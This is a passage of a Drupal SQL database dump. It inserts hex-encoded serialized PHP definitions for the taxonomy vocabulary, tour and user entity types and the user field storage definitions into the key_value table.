('entity.definitions.installed', 'taxonomy_vocabulary.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a31393a227461786f6e6f6d795f766f636162756c617279223b733a383a22002a00636c617373223b733a33333a2244727570616c5c7461786f6e6f6d795c456e746974795c566f636162756c617279223b733a31313a22002a0070726f7669646572223b733a383a227461786f6e6f6d79223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a393a7b733a323a226964223b733a333a22766964223b733a353a226c6162656c223b733a343a226e616d65223b733a363a22776569676874223b733a363a22776569676874223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a33333a2244727570616c5c7461786f6e6f6d795c456e746974795c566f636162756c617279223b733a31313a22002a0068616e646c657273223b613a353a7b733a373a2273746f72616765223b733a33333a2244727570616c5c7461786f6e6f6d795c566f636162756c61727953746f72616765223b733a31323a226c6973745f6275696c646572223b733a33373a2244727570616c5c7461786f6e6f6d795c566f636162756c6172794c6973744275696c646572223b733a363a22616363657373223b733a34363a2244727570616c5c7461786f6e6f6d795c566f636162756c617279416363657373436f6e74726f6c48616e646c6572223b733a343a22666f726d223b613a343a7b733a373a2264656661756c74223b733a33303a2244727570616c5c7461786f6e6f6d795c566f636162756c617279466f726d223b733a353a227265736574223b733a34303a2244727570616c5c7461786f6e6f6d795c466f726d5c566f636162756c6172795265736574466f726d223b733a363a2264656c657465223b733a34313a2244727570616c5c7461786f6e6f6d795c466f726d5c566f636162756c61727944656c657465466f726d223b733a383a226f76657276696577223b733a33343a2244727570616c5c7461786f6e6f6d795c466f726d5c4f766572766965775465726d73223b7d733a31343a22726f7574655f70726f7669646572223b613a323a7b733a343a2268746d6c223b733a35343a2244727570616c5c7461786f6e6f6d795c456e746974795c526f7574696e675c566f636162756c617279526f75746550726f7669646572223b733a31313a227065726d697373696f6e73223b733a34393a2244727570616c5c757365725c456e746974795c456e746974795065726d697373696f6e73526f75746550726f7669646572223b7d7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31393a2261646d696e6973746572207461786f6e6f6d79223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a373a7b733a383a226164642d666f726d223b733a32393a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f616464223b733a31313a2264656c6574652d666f726d223b733a36313a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f64656c657465223b733a31303a2272657365742d666f726d223b733a36303a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f7265736574223b733a31333a226f766572766965772d666f726d223b733a36333a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f76657276696577223b733a393a22656469742d666f726d223b733a35343a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d223b733a32333a22656e746974792d7065726d697373696f6e732d666f726d223b733a37353a222f61646d696e2f7374727563747572652f7461786f6e6f6d792f6d616e6167652f7b7461786f6e6f6d795f766f636162756c6172797d2f6f766572766965772f7065726d697373696f6e73223b733a31303a22636f6c6c656374696f6e223b733a32353a222f61646d696e2f7374727563747572652f7461786f6e6f6d79223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b733a31333a227461786f6e6f6d795f7465726d223b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31393a225461786f6e6f6d7920766f636162756c617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a383a225461786f6e6f6d79223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31303a22766f636162756c617279223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a22766f636162756c6172696573223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31373a2240636f756e7420766f636162756c617279223b733a363a22706c7572616c223b733a31393a2240636f756e7420766f636162756c6172696573223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a33313a22636f6e6669673a7461786f6e6f6d795f766f636162756c6172795f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b733a31303a22766f636162756c617279223b733a31343a22002a006c6f6f6b75705f6b657973223b613a313a7b693a303b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a343a7b693a303b733a343a226e616d65223b693a313b733a333a22766964223b693a323b733a31313a226465736372697074696f6e223b693a333b733a363a22776569676874223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'tour.entity_type', 0x4f3a34323a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747954797065223a34333a7b733a353a22002a006964223b733a343a22746f7572223b733a383a22002a00636c617373223b733a32333a2244727570616c5c746f75725c456e746974795c546f7572223b733a31313a22002a0070726f7669646572223b733a343a22746f7572223b733a31353a22002a007374617469635f6361636865223b623a303b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a383a7b733a323a226964223b733a323a226964223b733a353a226c6162656c223b733a353a226c6162656c223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a343a2275756964223b733a343a2275756964223b7d733a31363a22002a006f726967696e616c436c617373223b733a32333a2244727570616c5c746f75725c456e746974795c546f7572223b733a31313a22002a0068616e646c657273223b613a333a7b733a31323a22766965775f6275696c646572223b733a32373a2244727570616c5c746f75725c546f7572566965774275696c646572223b733a363a22616363657373223b733a33363a2244727570616c5c746f75725c546f7572416363657373436f6e74726f6c48616e646c6572223b733a373a2273746f72616765223b733a34353a2244727570616c5c436f72655c436f6e6669675c456e746974795c436f6e666967456e7469747953746f72616765223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a32393a2261646d696e6973746572207369746520636f6e66696775726174696f6e223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a303a7b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b4e3b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b4e3b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a303b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22546f7572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22546f757273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a22746f7572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a22746f757273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31313a2240636f756e7420746f7572223b733a363a22706c7572616c223b733a31323a2240636f756e7420746f757273223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a31333a22636f6e66696775726174696f6e223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a22436f6e66696775726174696f6e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b4e3b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a303b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a31363a22636f6e6669673a746f75725f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a303a7b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a31363a22002a00636f6e6669675f707265666978223b4e3b733a31343a22002a006c6f6f6b75705f6b657973223b613a323a7b693a303b733a31393a22726f757465732e2a2e726f7574655f6e616d65223b693a313b733a343a2275756964223b7d733a31363a22002a00636f6e6669675f6578706f7274223b613a353a7b693a303b733a323a226964223b693a313b733a353a226c6162656c223b693a323b733a363a226d6f64756c65223b693a333b733a363a22726f75746573223b693a343b733a343a2274697073223b7d733a32313a22002a006d6572676564436f6e6669674578706f7274223b613a303a7b7d7d),
('entity.definitions.installed', 'user.entity_type', 0x4f3a33363a2244727570616c5c436f72655c456e746974795c436f6e74656e74456e7469747954797065223a34303a7b733a353a22002a006964223b733a343a2275736572223b733a383a22002a00636c617373223b733a32333a2244727570616c5c757365725c456e746974795c55736572223b733a31313a22002a0070726f7669646572223b733a343a2275736572223b733a31353a22002a007374617469635f6361636865223b623a313b733a31353a22002a0072656e6465725f6361636865223b623a313b733a31393a22002a0070657273697374656e745f6361636865223b623a313b733a31343a22002a00656e746974795f6b657973223b613a373a7b733a323a226964223b733a333a22756964223b733a383a226c616e67636f6465223b733a383a226c616e67636f6465223b733a343a2275756964223b733a343a2275756964223b733a383a227265766973696f6e223b733a303a22223b733a363a2262756e646c65223b733a303a22223b733a31363a2264656661756c745f6c616e67636f6465223b733a31363a2264656661756c745f6c616e67636f6465223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b733a32393a227265766973696f6e5f7472616e736c6174696f6e5f6166666563746564223b7d733a31363a22002a006f726967696e616c436c617373223b733a32333a2244727570616c5c757365725c456e746974795c55736572223b733a31313a22002a0068616e646c657273223b613a393a7b733a373a2273746f72616765223b733a32333a2244727570616c5c757365725c5573657253746f72616765223b733a31343a2273746f726167655f736368656d61223b733a32393a2244727570616c5c757365725c5573657253746f72616765536368656d61223b733a363a22616363657373223b733a33363a2244727570616c5c757365725c55736572416363657373436f6e74726f6c48616e646c6572223b733a31323a226c6973745f6275696c646572223b733a32373a2244727570616c5c757365725c557365724c6973744275696c646572223b733a31303a2276696577735f64617461223b733a32353a2244727570616c5c757365725c55736572566965777344617461223b733a31343a22726f7574655f70726f7669646572223b613a313a7b733a343a2268746d6c223b733a33363a2244727570616c5c757365725c456e746974795c55736572526f75746550726f7669646572223b7d733a343a22666f726d223b613a333a7b733a373a2264656661756c74223b733a32333a2244727570616c5c757365725c50726f66696c65466f726d223b733a363a2263616e63656c223b733a33313a2244727570616c5c757365725c466f726d5c5573657243616e63656c466f726d223b733a383a227265676973746572223b733a32343a2244727570616c5c757365725c5265676973746572466f726d223b7d733a31313a227472616e736c6174696f6e223b733a33373a2244727570616c5c757365725c50726f66696c655472616e736c6174696f6e48616e646c6572223b733a31323a22766965775f6275696c646572223b733a33363a2244727570616c5c436f72655c456e746974795c456e74697479566965774275696c646572223b7d733a31393a22002a0061646d696e5f7065726d697373696f6e223b733a31363a2261646d696e6973746572207573657273223b733a32353a22002a007065726d697373696f6e5f6772616e756c6172697479223b733a31313a22656e746974795f74797065223b733a383a22002a006c696e6b73223b613a343a7b733a393a2263616e6f6e6963616c223b733a31323a222f757365722f7b757365727d223b733a393a22656469742d666f726d223b733a31373a222f757365722f7b757365727d2f65646974223b733a31313a2263616e63656c2d666f726d223b733a31393a222f757365722f7b757365727d2f63616e63656c223b733a31303a22636f6c6c656374696f6e223b733a31333a222f61646d696e2f70656f706c65223b7d733a32313a22002a0062756e646c655f656e746974795f74797065223b4e3b733a31323a22002a0062756e646c655f6f66223b4e3b733a31353a22002a0062756e646c655f6c6162656c223b4e3b733a31333a22002a00626173655f7461626c65223b733a353a227573657273223b733a32323a22002a007265766973696f6e5f646174615f7461626c65223b4e3b733a31373a22002a007265766973696f6e5f7461626c65223b4e3b733a31333a22002a00646174615f7461626c65223b733a31363a2275736572735f6669656c645f64617461223b733a31313a22002a00696e7465726e616c223b623a303b733a31353a22002a007472616e736c617461626c65223b623a313b733a31393a22002a0073686f775f7265766973696f6e5f7569223b623a303b733a383a22002a006c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255736572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31393a22002a006c6162656c5f636f6c6c656374696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a225573657273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31373a22002a006c6162656c5f73696e67756c6172223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2275736572223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31353a22002a006c6162656c5f706c7572616c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a353a227573657273223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31343a22002a006c6162656c5f636f756e74223b613a333a7b733a383a2273696e67756c6172223b733a31313a2240636f756e742075736572223b733a363a22706c7572616c223b733a31323a2240636f756e74207573657273223b733a373a22636f6e74657874223b4e3b7d733a31353a22002a007572695f63616c6c6261636b223b4e3b733a383a22002a0067726f7570223b733a373a22636f6e74656e74223b733a31343a22002a0067726f75705f6c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a22436f6e74656e74223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a313a7b733a373a22636f6e74657874223b733a31373a22456e7469747920747970652067726f7570223b7d7d733a32323a22002a006669656c645f75695f626173655f726f757465223b733a32323a22656e746974792e757365722e61646d696e5f666f726d223b733a32363a22002a00636f6d6d6f6e5f7265666572656e63655f746172676574223b623a313b733a32323a22002a006c6973745f63616368655f636f6e7465787473223b613a303a7b7d733a31383a22002a006c6973745f63616368655f74616773223b613a313a7b693a303b733a393a22757365725f6c697374223b7d733a31343a22002a00636f6e73747261696e7473223b613a323a7b733a31333a22456e746974794368616e676564223b4e3b733a32363a22456e74697479556e7472616e736c617461626c654669656c6473223b4e3b7d733a31333a22002a006164646974696f6e616c223b613a303a7b7d733a31343a22002a005f73657276696365496473223b613a303a7b7d733a31383a22002a005f656e7469747953746f7261676573223b613a303a7b7d733a32303a22002a00737472696e675472616e736c6174696f6e223b4e3b733a32353a22002a007265766973696f6e5f6d657461646174615f6b657973223b613a313a7b733a31363a227265766973696f6e5f64656661756c74223b733a31363a227265766973696f6e5f64656661756c74223b7d7d);
INSERT INTO `key_value` (`collection`, `name`, `value`) VALUES
('entity.definitions.installed', 'user.field_storage_definitions', 0x613a31383a7b733a333a22756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a373a2255736572204944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31323a2254686520757365722049442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a343a2275736572223b733a31303a226669656c645f6e616d65223b733a333a22756964223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31383a226669656c645f6974656d3a696e7465676572223b733a383a2273657474696e6773223b613a363a7b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b733a333a226d696e223b733a303a22223b733a333a226d6178223b733a303a22223b733a363a22707265666978223b733a303a22223b733a363a22737566666978223b733a303a22223b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a323b7d733a373a22002a0074797065223b733a373a22696e7465676572223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a333a22696e74223b733a383a22756e7369676e6564223b623a313b733a343a2273697a65223b733a363a226e6f726d616c223b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a343a2275756964223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a343a2255554944223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a393a22726561642d6f6e6c79223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31343a22546865207573657220555549442e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a343a2275736572223b733a31303a226669656c645f6e616d65223b733a343a2275756964223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31353a226669656c645f6974656d3a75756964223b733a383a2273657474696e6773223b613a333a7b733a31303a226d61785f6c656e677468223b693a3132383b733a383a2269735f6173636969223b623a313b733a31343a22636173655f73656e736974697665223b623a303b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a34303b7d733a373a22002a0074797065223b733a343a2275756964223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a333a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a3132383b733a363a2262696e617279223b623a303b7d7d733a31313a22756e69717565206b657973223b613a313a7b733a353a2276616c7565223b613a313a7b693a303b733a353a2276616c7565223b7d7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a383a226c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a393a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a31333a224c616e677561676520636f6465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a373a22646973706c6179223b613a323a7b733a343a2276696577223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d733a343a22666f726d223b613a313a7b733a373a226f7074696f6e73223b613a313a7b733a363a22726567696f6e223b733a363a2268696464656e223b7d7d7d733a31323a227472616e736c617461626c65223b623a313b733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32333a225468652075736572206c616e677561676520636f64652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a343a2275736572223b733a31303a226669656c645f6e616d65223b733a383a226c616e67636f6465223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a323a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a37373b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a31383a227072656665727265645f6c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a373a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a32333a22507265666572726564206c616e677561676520636f6465223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a31313a226465736372697074696f6e223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b733a37373a225468652075736572277320707265666572726564206c616e677561676520636f646520666f7220726563656976696e6720656d61696c7320616e642076696577696e672074686520736974652e223b733a31323a22002a00617267756d656e7473223b613a303a7b7d733a31303a22002a006f7074696f6e73223b613a303a7b7d7d733a383a2270726f7669646572223b733a343a2275736572223b733a31303a226669656c645f6e616d65223b733a31383a227072656665727265645f6c616e67636f6465223b733a31313a22656e746974795f74797065223b733a343a2275736572223b733a363a2262756e646c65223b4e3b733a31333a22696e697469616c5f76616c7565223b4e3b7d733a31373a22002a006974656d446566696e6974696f6e223b4f3a35313a2244727570616c5c436f72655c4669656c645c5479706564446174615c4669656c644974656d44617461446566696e6974696f6e223a323a7b733a31333a22002a00646566696e6974696f6e223b613a333a7b733a343a2274797065223b733a31393a226669656c645f6974656d3a6c616e6775616765223b733a383a2273657474696e6773223b613a303a7b7d733a31313a22636f6e73747261696e7473223b613a313a7b733a31313a22436f6d706c657844617461223b613a313a7b733a353a2276616c7565223b613a323a7b733a31333a22416c6c6f77656456616c756573223b613a313a7b733a383a2263616c6c6261636b223b733a36303a2244727570616c5c757365725c456e746974795c557365723a3a676574416c6c6f776564436f6e666967757261626c654c616e6775616765436f646573223b7d733a363a224c656e677468223b613a313a7b733a333a226d6178223b693a31323b7d7d7d7d7d733a31383a22002a006669656c64446566696e6974696f6e223b723a3131353b7d733a373a22002a0074797065223b733a383a226c616e6775616765223b733a393a22002a00736368656d61223b613a343a7b733a373a22636f6c756d6e73223b613a313a7b733a353a2276616c7565223b613a323a7b733a343a2274797065223b733a31333a22766172636861725f6173636969223b733a363a226c656e677468223b693a31323b7d7d733a31313a22756e69717565206b657973223b613a303a7b7d733a373a22696e6465786573223b613a303a7b7d733a31323a22666f726569676e206b657973223b613a303a7b7d7d733a31303a22002a00696e6465786573223b613a303a7b7d7d733a32343a227072656665727265645f61646d696e5f6c616e67636f6465223b4f3a33373a2244727570616c5c436f72655c4669656c645c426173654669656c64446566696e6974696f6e223a353a7b733a31333a22002a00646566696e6974696f6e223b613a383a7b733a353a226c6162656c223b4f3a34383a2244727570616c5c436f72655c537472696e675472616e736c6174696f6e5c5472616e736c617461626c654d61726b7570223a333a7b733a393a22002a00737472696e67223b